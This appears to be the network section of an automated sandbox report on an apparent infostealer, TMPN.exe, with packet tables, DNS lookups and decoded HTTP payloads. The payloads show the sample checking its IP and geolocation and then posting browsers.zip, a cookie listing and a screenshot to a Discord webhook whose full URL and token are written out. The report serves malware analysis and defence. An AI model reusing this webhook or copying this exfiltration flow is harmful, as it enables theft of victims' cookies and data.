Sep 3, 2024 04:18:27.182074070 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.182128906 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.182435989 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.182452917 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.778033018 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.784583092 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.784600019 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.785063982 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.785068989 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.786242008 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.786324978 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.802598953 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.802726984 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.802736998 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.802764893 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.802779913 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.802815914 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.802884102 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.802954912 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.802954912 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.802973986 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.802990913 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.803008080 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.803208113 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.803229094 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.803262949 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.803272963 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.803407907 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.803422928 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.803431988 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.803442001 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.803458929 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.803488970 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.803498983 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.803889036 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805469036 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805490971 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805502892 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805516958 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805597067 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805612087 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805632114 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805648088 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805661917 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805670023 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805692911 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805722952 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805740118 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805757999 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805773973 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805784941 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805795908 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805805922 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805823088 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805843115 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805846930 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805866957 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805883884 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805896044 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805912018 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805921078 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805938005 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805946112 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805958986 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805972099 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.805985928 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.805993080 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.806001902 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.806008101 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.806030035 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.806071043 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.806154013 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.806183100 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.806206942 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.812953949 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.813965082 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.813985109 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:27.814033985 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.814064980 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.814114094 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.814127922 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:27.817720890 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.353749990 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.353876114 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.353929996 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.398834944 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.398875952 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.398899078 CEST	49720	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.398905039 CEST	443	49720	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.424310923 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.424385071 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.424447060 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.425616026 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.425641060 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.859461069 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.859684944 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.859713078 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.859874010 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.859879017 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.860790968 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.860862017 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.861808062 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.861884117 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:28.862139940 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:28.862149000 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:29.032641888 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:29.032712936 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:29.032799959 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:29.044816017 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:29.044864893 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:29.044887066 CEST	49721	443	192.168.2.6	162.159.128.233
Sep 3, 2024 04:18:29.044894934 CEST	443	49721	162.159.128.233	192.168.2.6
Sep 3, 2024 04:18:40.990022898 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:18:40.995080948 CEST	80	49711	208.95.112.1	192.168.2.6
Sep 3, 2024 04:19:08.317333937 CEST	80	49711	208.95.112.1	192.168.2.6
Sep 3, 2024 04:19:08.317397118 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:19:08.317491055 CEST	49711	80	192.168.2.6	208.95.112.1
Sep 3, 2024 04:19:08.322235107 CEST	80	49711	208.95.112.1	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 3, 2024 04:18:00.725150108 CEST	52590	53	192.168.2.6	1.1.1.1
Sep 3, 2024 04:18:00.731950998 CEST	53	52590	1.1.1.1	192.168.2.6
Sep 3, 2024 04:18:02.536459923 CEST	50705	53	192.168.2.6	1.1.1.1
Sep 3, 2024 04:18:02.543215990 CEST	53	50705	1.1.1.1	192.168.2.6
Sep 3, 2024 04:18:04.205123901 CEST	65026	53	192.168.2.6	1.1.1.1
Sep 3, 2024 04:18:04.212393045 CEST	53	65026	1.1.1.1	192.168.2.6
Sep 3, 2024 04:18:27.169703960 CEST	55711	53	192.168.2.6	1.1.1.1
Sep 3, 2024 04:18:27.176899910 CEST	53	55711	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 3, 2024 04:18:00.725150108 CEST	192.168.2.6	1.1.1.1	0x70a4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:02.536459923 CEST	192.168.2.6	1.1.1.1	0x3fd8	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:04.205123901 CEST	192.168.2.6	1.1.1.1	0xbfa	Standard query (0)	ptb.discord.com	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:27.169703960 CEST	192.168.2.6	1.1.1.1	0xb716	Standard query (0)	ptb.discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 3, 2024 04:18:00.731950998 CEST	1.1.1.1	192.168.2.6	0x70a4	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:00.731950998 CEST	1.1.1.1	192.168.2.6	0x70a4	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:00.731950998 CEST	1.1.1.1	192.168.2.6	0x70a4	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:02.543215990 CEST	1.1.1.1	192.168.2.6	0x3fd8	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:04.212393045 CEST	1.1.1.1	192.168.2.6	0xbfa	No error (0)	ptb.discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:04.212393045 CEST	1.1.1.1	192.168.2.6	0xbfa	No error (0)	ptb.discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:04.212393045 CEST	1.1.1.1	192.168.2.6	0xbfa	No error (0)	ptb.discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:04.212393045 CEST	1.1.1.1	192.168.2.6	0xbfa	No error (0)	ptb.discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:04.212393045 CEST	1.1.1.1	192.168.2.6	0xbfa	No error (0)	ptb.discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:27.176899910 CEST	1.1.1.1	192.168.2.6	0xb716	No error (0)	ptb.discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:27.176899910 CEST	1.1.1.1	192.168.2.6	0xb716	No error (0)	ptb.discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:27.176899910 CEST	1.1.1.1	192.168.2.6	0xb716	No error (0)	ptb.discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:27.176899910 CEST	1.1.1.1	192.168.2.6	0xb716	No error (0)	ptb.discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 04:18:27.176899910 CEST	1.1.1.1	192.168.2.6	0xb716	No error (0)	ptb.discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

ptb.discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	208.95.112.1	80	2244	C:\Users\user\Desktop\TMPN.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 04:18:02.550251961 CEST	111	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Sep 3, 2024 04:18:03.039225101 CEST	175	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 02:18:02 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false
Sep 3, 2024 04:18:10.869684935 CEST	95	OUT	GET /json HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Sep 3, 2024 04:18:10.974193096 CEST	482	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 02:18:10 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 52 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}
Sep 3, 2024 04:18:40.990022898 CEST	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	172.67.74.152	443	2244	C:\Users\user\Desktop\TMPN.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 02:18:01 UTC	94	OUT	GET / HTTP/1.1 Host: api.ipify.org User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-09-03 02:18:01 UTC	211	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 02:18:01 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8bd23f2e4d63c33b-EWR
2024-09-03 02:18:01 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	162.159.128.233	443	2244	C:\Users\user\Desktop\TMPN.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 02:18:05 UTC	326	OUT	POST /api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d HTTP/1.1 Host: ptb.discord.com User-Agent: Go-http-client/1.1 Content-Length: 1238 Content-Type: multipart/form-data; boundary=6fa5837df89a24915ced53a41629d349a000502395b65d6d30be104b3056 Accept-Encoding: gzip
2024-09-03 02:18:05 UTC	860	OUT	Data Raw: 2d 2d 36 66 61 35 38 33 37 64 66 38 39 61 32 34 39 31 35 63 65 64 35 33 61 34 31 36 32 39 64 33 34 39 61 30 30 30 35 30 32 33 39 35 62 36 35 64 36 64 33 30 62 65 31 30 34 62 33 30 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 30 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 65 6e 67 69 6e 65 65 72 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 62 72 6f 77 73 65 72 73 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 00 00 00 65 6e 67 Data Ascii: --6fa5837df89a24915ced53a41629d349a000502395b65d6d30be104b3056Content-Disposition: form-data; name="file[0]"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\browsers.zip"Content-Type: application/octet-streamPK#eng
2024-09-03 02:18:05 UTC	378	OUT	Data Raw: 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 60 60 60 f0 9f 93 82 20 2d 20 65 6e 67 69 6e 65 65 72 5c 6e 20 20 20 20 e2 94 94 e2 94 80 e2 94 80 20 f0 9f 93 82 20 2d 20 43 68 72 6f 6d 65 5c 6e 20 20 20 20 20 20 20 20 e2 94 94 e2 94 80 e2 94 80 20 f0 9f 93 82 20 2d 20 44 65 66 61 75 6c 74 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 e2 94 94 e2 94 80 e2 94 80 20 f0 9f 93 84 20 2d 20 63 6f 6f 6b 69 65 73 2e 74 78 74 20 28 30 2e 32 38 20 6b 62 29 5c 6e 60 60 60 22 2c 22 66 6f 6f 74 65 72 22 3a 7b 22 69 63 6f 6e 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 75 2f 31 34 35 34 38 37 38 34 35 3f 76 3d 34 22 2c 22 74 65 78 74 22 3a 22 73 6b 75 6c 64 20 2d 20 6d 61 64 65 20 Data Ascii: 1,"description":"``` - user\n - Chrome\n - Default\n - cookies.txt (0.28 kb)\n```","footer":{"icon_url":"https://avatars.githubusercontent.com/u/145487845?v=4","text":"skuld - made
2024-09-03 02:18:05 UTC	1237	IN	HTTP/1.1 404 Not Found Date: Tue, 03 Sep 2024 02:18:05 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=c0eb7746699a11ef9461de324fe0fe8a; Expires=Sun, 02-Sep-2029 02:18:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1725329886 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BiPhAM5CyqZhXR5XzQVJljf6G6oL2hyOPvhfjTVCoUNWeMArKBXrltfBrR2a6DOkmBfKfbjwQkYqPW8fGJumwRLtvPDS8kRrPrmPepNI3FiJ7dgcf6fcTJXVmAXPaYuEA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=c0eb7746699a11ef9461de324fe0fe8a911be15e8723d256a05f1fbbb791e3a047210cfd12d30c668b041118e92a6b07; Expires=Sun, 02-Sep-2029 02:18:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2024-09-03 02:18:05 UTC	347	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 66 64 31 34 66 31 63 66 66 32 38 31 30 31 65 30 66 32 65 65 66 38 38 34 36 38 30 65 35 32 39 62 38 33 62 66 36 35 32 37 2d 31 37 32 35 33 32 39 38 38 35 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 32 53 79 48 4b 59 65 59 39 5a 52 51 6d 41 78 58 70 71 73 56 48 44 46 54 6c 32 38 31 73 4a 6b 64 72 5f 35 6b 62 54 69 68 51 65 51 2d 31 37 32 35 33 32 39 38 38 35 34 34 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 Data Ascii: Set-Cookie: __cfruid=fd14f1cff28101e0f2eef884680e529b83bf6527-1725329885; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=2SyHKYeY9ZRQmAxXpqsVHDFTl281sJkdr_5kbTihQeQ-1725329885444-0.0.1.1-604800000; path=/; domain=.discor
2024-09-03 02:18:05 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49720	162.159.128.233	443	2244	C:\Users\user\Desktop\TMPN.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 02:18:27 UTC	328	OUT	POST /api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d HTTP/1.1 Host: ptb.discord.com User-Agent: Go-http-client/1.1 Content-Length: 481037 Content-Type: multipart/form-data; boundary=91d320d9f45d86ba537c85c520e561ac8f9fb2395cba2c9ed6aba9dea82d Accept-Encoding: gzip
2024-09-03 02:18:27 UTC	858	OUT	Data Raw: 2d 2d 39 31 64 33 32 30 64 39 66 34 35 64 38 36 62 61 35 33 37 63 38 35 63 35 32 30 65 35 36 31 61 63 38 66 39 66 62 32 33 39 35 63 62 61 32 63 39 65 64 36 61 62 61 39 64 65 61 38 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 30 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 65 6e 67 69 6e 65 65 72 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 49 6d 55 38 74 45 34 4a 38 50 5c 5c 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 Data Ascii: --91d320d9f45d86ba537c85c520e561ac8f9fb2395cba2c9ed6aba9dea82dContent-Disposition: form-data; name="file[0]"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\ImU8tE4J8P\\Display (1).png"Content-Type: application/octet-streamPNGIHDR
2024-09-03 02:18:27 UTC	2372	OUT	Data Raw: 57 5e 5a d0 78 6a df cb da d8 f2 57 5d 95 96 ee 97 f7 d8 f7 92 b4 e8 95 17 17 e8 8b a5 f9 1e 7c 6e c9 7e 97 96 d8 d2 7d 2f 4d 4b 5e 99 73 f6 c9 f9 c3 d8 3b 5f 77 af 4b d2 d4 9e 17 a7 ee 1e 17 a5 ce ee 17 96 3e f1 a5 af cc f7 96 63 1a 0b f2 69 97 ec 73 59 5a 9e 73 96 e5 76 09 b1 9c 47 bb 94 bc dc ef ec 7a 7e 99 63 bc 28 ef d3 dd ed 82 d2 7a 6c 2a 5f 8f b6 86 38 2c de fd a2 b4 64 8f bc 6f 03 e3 45 bb e5 b9 5d 2f 28 74 77 39 bf 8d 2d df fb b2 b4 6c af bc 6f ee 7b 2e ed d2 dd f3 fa dd f2 be 3b 9f 9f ba 3b 9d 57 da 45 bb e4 fb d9 f5 bc c2 d4 2e e7 a6 ee ce e7 b4 30 86 a5 7b e4 6b e5 b6 b3 d3 d9 25 6f c9 ee 17 14 16 ef 96 af 9b f1 b5 b4 c4 98 5f 96 3f eb d2 fc f9 97 ec 72 5e 69 35 56 6c f1 ce 79 ff 1d f3 9e 3b 9d 53 60 0c cc f5 b1 53 8e ef 98 e7 33 ea 4f 6d 7f Data Ascii: W^ZxjW]\|n~}/MK^s;_wK>cisYZsvGz~c(zl*_8,doE]/(tw9-lo{.;;WE.0{k%o_?r^i5Vly;S`S3Om
